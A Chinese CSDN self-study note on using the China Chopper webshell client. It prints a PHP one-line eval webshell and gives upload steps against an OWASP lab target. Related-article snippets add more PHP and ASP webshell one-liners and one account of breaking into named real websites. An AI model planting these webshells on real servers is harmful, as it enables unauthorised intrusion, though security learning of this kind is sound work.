自学渗透第四天--中国菜刀

最新推荐文章于 2024-03-17 09:46:12 发布
最新推荐文章于 2024-03-17 09:46:12 发布
阅读量1.2k 收藏 5
点赞数 3
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43710367/article/details/106064526
版权

自学渗透第四天–中国菜刀

一、如何使用
中国菜刀的使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。
(1)首先将一句话木马上传至网站后台。
在这里插入图片描述
(2)运行该文件,确认文件上传成功。
在这里插入图片描述
(3)复制该链接到中国菜刀,并输入相应的密码。
在这里插入图片描述
(4)成功获取网站shell。
在这里插入图片描述

二、常用功能
1、上传本地文件到网站后台。
在这里插入图片描述

最低0.47元/天 解锁文章
好奇真的很好奇
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络安全实验十三 渗透测试项目
qq_64314976的博客
06-23 1832
步骤:在虚拟终端输入创建一个名叫hacker密码为111111的用户,但直接添加到管理组提升不了权限,远程桌面过去,输入账号hacker密码111111即可登录,登陆后发现没有administrators这个组,用whoami /all查看获取本地系统上所有用户(访问令牌)的用户名和组信息,注意到第一个的类型是别名(另外两个是已知),改名将hacker添加到管理组,成功执行,可以看到组成员多了一项。3、获得服务器上的关键敏感数据(C:\console)内。(网页关入侵--铜牌任务)(入侵提权--银牌任务)
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
qq_53058639的博客
03-16 1464
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
渗透教程渗透教程
08-18
今天我们还是讲渗透、 只不过用到的工具不同 御剑孤独1.5+明小子 我是傻瓜先生 自从上次做了个 菜刀 +椰树的教程 我的站就被两个孙子给黑了 我实在看不下去。 我放出教程是为了让你们学习。你们却来搞我。 不多说了 教程开始 OK。还是一样 随便找个网站 http://www.zztiancaiedu.com/ http://news.jiaotou.org/ http://gz.ewangpai.com/ 就上次的这些站 需要等待一下 这里需要点时间我就暂停一下 OK,扫描好了 竟然没猜到 换一个 好吧再换一个 这里我们需要 MD5解密 OK。进后台了 可以邪恶了。 会的 可以传小马 代替数据库然后穿大马。 我这里就不详细讲解了。 欢迎各位来和我交流讨论 也希望有大牛来啊
菜刀渗透
刘思成的博客
03-27 2473
快速搭建discuz论坛 使用kali下BurpSuite对discuz后台注入php木马 使用Cknife“菜刀”.上传webshell木马到网站 使用Webshell查看mysql数据库密码并盗取数据库 快速搭建discuz论坛 攻击思路 想要拿下一台主机A的权限: 1、了解一下这个服务器:端口,服务器版本,操作系统版本,找漏洞 2、拿到对A有一定权限的身份,如果对方是一个WEB服务器,就利用...
上传渗透----中国菜刀和kali的使用(安全攻防)
baidu_38803985的博客
04-09 4883
1.实验环境 目标靶机:OWASP_Broken_Web_Apps_VM_1.2 下载地址 我们还需要中国菜刀和kali这两个工具 实验原理 1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 3、如果恶意文件如PHP、ASP等执行文件绕...
渗透工具环境篇——Cknife中国菜刀的使用
热门推荐
Litbai_zhang
10-09 2万+
提要 在学习上传漏洞的时候研究到了Cknife这个软件。下面来介绍一下菜刀的使用方法。 使用 1.下载菜刀,打开Cknife.jar软件 2.右键点击添加 3.输入上传的php文件,php文件密码,脚本类型选择PHP,字符编码GB2312,点击添加 4.右键文件管理 成功 ...
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)
网络安全领域优质创作者
11-21 2132
本质 : 上传一句话木马 <?php echo shell_exec($_GET[‘cmd‘]);?> windows平台 中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: <%execute(request("pass"))%> p...
广东自学考试本科-复习资料-历年真题
01-23
广东自学考试本科是广东省教育考试院主办的一种高等教育自学考试形式,旨在为自学者提供系统学习并获取本科学历的机会。历年真题作为复习资料,对于考生来说至关重要,因为它们可以帮助考生了解考试的出题趋势、重点...
广东自学考试本科-复习资料-历年真题 参考广东自学考试本科-复习资料-历年真题 参考广东自学考试本科-复习资料-历年真题 参考广
01-23
广东自学考试本科-复习资料-历年真题 参考广东自学考试本科-复习资料-历年真题 参考广东自学考试本科-复习资料-历年真题 参考广东自学考试广东自学考试本科-复习资料-历年真题 参考广东自学考试本科-复习资料-历年...
广东自学考试本科-复习资料-历年真题 参考
01-23
广东自学考试本科-复习资料-历年真题 参考
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
最新发布
qq_53058639的博客
03-17 1227
在测试过程中,我们经常会运到各种webshell管理工具,这里我介绍几种常见的webshell工具给大家。webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。?
2018-11 中国菜刀小试记录(windows环境)
昨天今天下雨天的博客
11-05 2855
一. 简介: 往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录并可执行一些web账号所有权限的系统命令,进入后渗透阶段。 传说中的官方网站:http://maicaidao.co/   。下载的时候发现是2014年的版本。。。 测试完官方的中国菜刀后,从Cracer的Cracer安全工具包v7版中拿了一个相对较新的,但是发现百度上...
初始webshell+中国菜刀的使用
m0_48222671的博客
04-18 5316
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 文章目录一、webshell是什么?二、木马三、中国菜刀 一、webshell是什么? “Web” 的含义是服务器开放web服务; "Shell"的含义是取得对服务器某种程度上的操作权限; "webshell"就是获取对服务器的控制权限,这就需要我们借助一些webshell管理工具和一些漏洞去得到这种权限。 二、木马 在我们使用webshell管理工具之前,需要先在目标服务器上传或创建一个木马文件 木马分为大马、小马和一句话木马: 小马:文.
菜刀的用法
小兴的学习笔记
12-13 1871
1.一句话木马 PHP //加容错代码 @eval($_POST['angel']) //绕过<?限制 //绕过某些限制 ASP ASPX 2.连接菜刀 如下图:右键--添加即可。 angel为 $_POST['angel']这里的angel相当于密码。 然后就可以操作了。 菜刀下载地址:菜刀
中国菜刀使用与原理分析
weixin_45597678的博客
12-04 1万+
中国菜刀的功能 中国菜刀的使用 原理分析
市面上大部分渗透工具下载
lyg920的专栏
02-24 1573
亡灵-幽少2017-02-24共20975人围观 ,发现 9 个不明物体工具 大家好,本人第一次撰写文章,望大家多多支持:) 在咱们freebuf的网站上有很多人发了贴在讲一些工具怎么用, 下面将展现绝大多数的工具及下载地址:P ARP欺骗 ARP EMP v1.0 http://www.xdowns.com/soft/1/44/201
文件上传漏洞渗透和防御、webshell及中国菜刀(网络安全学习10)
Until_U的博客
07-03 2894
声明:从这篇文章开始我正式学习网络安全中常见的攻击和防御手段。我们要知道,我们要学习这个是为了了解网络中常见的攻击手段,只有了解了这些手段之后,我们才能对此做出相应的防御手段哦。 在学习本章文件上传漏洞之前,大家要先了解网络安全法,了解网络安全法则,从入门到入狱可不建议哦,哈哈。下面开始学习啦。 中华人民共和国网络安全法 CONTENTS 1 攻击渗透环境搭建 2文件上传漏洞渗透及防御 2.1 文件上传漏洞基本操作(low安全级别) 2.2 文件类型限制利用工具burpsuite(me..
构建完善的安全渗透测试环境:推荐工具、资源和下载链接
weixin_43263566的博客
02-14 3611
安全渗透环境准备(工具下载)
基于proteus无实物stm32入门自学教程(四)--动态数码管
07-02
### 回答1: 基于Proteus仿真软件进行STM32动态数码管编程学习,首先我们需要了解动态数码管的工作原理。动态数码管是由多个七段数码管组成,通过不断刷新每个数码管的显示内容,以达到显示更多位数的数字或字符的目的。 在Proteus中,我们可以选择适合的STM32芯片模型,并添加相应的动态数码管模块。接下来,我们需要编写程序来实现动态数码管的显示。 首先,我们需要定义动态数码管的引脚连接。在STM32芯片上,动态数码管的引脚连接方式可以根据具体的硬件设计进行调整。在程序中,我们需要定义动态数码管的引脚连接方式,并通过GPIO口控制引脚的电平状态。 接下来,我们需要编写一个循环程序来实现动态数码管的显示。在循环中,我们可以通过控制不同的引脚电平状态,来依次显示不同的数字或字符。可以通过定义数组,将每个数码管需要显示的数字或字符存储起来,并在循环中不断刷新数码管的显示内容。 同时,我们还可以通过延时函数来控制数码管的刷新速度,以实现不同的效果。通过调整延时时间,可以使得数码管的刷新速度更快或更慢。 最后,我们需要在Proteus中进行仿真,来验证我们编写的动态数码管程序是否符合预期。通过观察仿真结果,我们可以判断程序的正确性,并对程序进行调试和优化。 总结来说,基于Proteus无实物STM32入门自学教程中的第四部分动态数码管编程,我们需要了解动态数码管的工作原理,并通过编写程序来实现动态数码管的显示。在仿真中,我们可以验证程序的正确性,并进行调试和优化。这样,我们就可以通过自学来掌握STM32动态数码管的编程知识。 ### 回答2: 基于Proteus仿真软件,STM32入门自学教程的第四部分介绍了如何使用动态数码管。动态数码管是一种常用的数字显示器,它可以显示数字0-9以及一些字母和符号。通过控制数码管的引脚状态,我们可以实现不同的数字显示效果。 首先,我们需要添加动态数码管的模型到Proteus中。在Components库中找到7-Segment Display元件,并将其拖放到工作区。 接下来,我们需要配置STM32的引脚以控制动态数码管的显示。打开STM32的配置文件,在引脚配置下拉菜单中选择对应的引脚,并将其配置为GPIO输出模式。 然后,编写代码来控制动态数码管。首先,需要包含相应的头文件,例如"stm32f10x.h"。然后定义需要使用的引脚和数码管的显示内容。在主函数中,设置引脚状态以显示相应的数字。通过改变引脚状态的顺序和频率,可以实现不同的数字显示效果。 最后,编译代码并下载到STM32开发板上进行测试。在Proteus中仿真验证代码功能是否正确。 通过这个实例,我们可以学到如何使用Proteus和STM32开发板来模拟动态数码管的显示效果。这对于学习嵌入式系统和数字电路设计非常有帮助。希望这个教程对你入门STM32有所帮助。 ### 回答3: 基于Proteus无实物的STM32入门自学教程(四)-动态数码管 动态数码管是一种常见的数字显示器件,通过控制不同的LED段的亮灭状态来显示数字或字符。在这个教程中,我们将学习如何在Proteus中使用动态数码管。 1. 首先,打开Proteus软件,在工具栏中选择“元件模式”按钮,并在搜索栏中输入“7段数码管”。 2. 在搜索结果中,选择一个你喜欢的7段数码管组件并将其拖拽到工作区中。 3. 然后,我们需要一个STM32微控制器来控制数码管显示。同样,在元件模式中搜索“STM32”,选择一个合适的型号,并将其拖拽到工作区中。 4. 连接数码管和STM32微控制器。首先,将STM32的GND引脚连接到数码管的GND引脚。然后,将STM32的PA0引脚连接到数码管的A引脚,PB0引脚连接到数码管的B引脚,依此类推,将其他引脚连接到相应的数码管引脚。 5. 设置STM32的引脚为输出模式。点击STM32元件,选择“属性”窗口,在引脚设置中,将所有需要控制数码管的引脚设置为“输出”。 6. 编写STM32的控制程序。点击STM32元件,选择“编辑C代码”按钮,在打开的编辑器中编写程序。通过驱动不同的引脚输出高低电平来控制数码管显示不同的数字或字符。 7. 仿真运行程序。点击Proteus工具栏中的“运行仿真”按钮,然后观察数码管的显示是否与程序中设定的一致。 这就是利用Proteus实现动态数码管的入门教程。通过这个教程,你将学会如何在Proteus中使用动态数码管,并通过使用STM32微控制器来控制数码管的显示。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值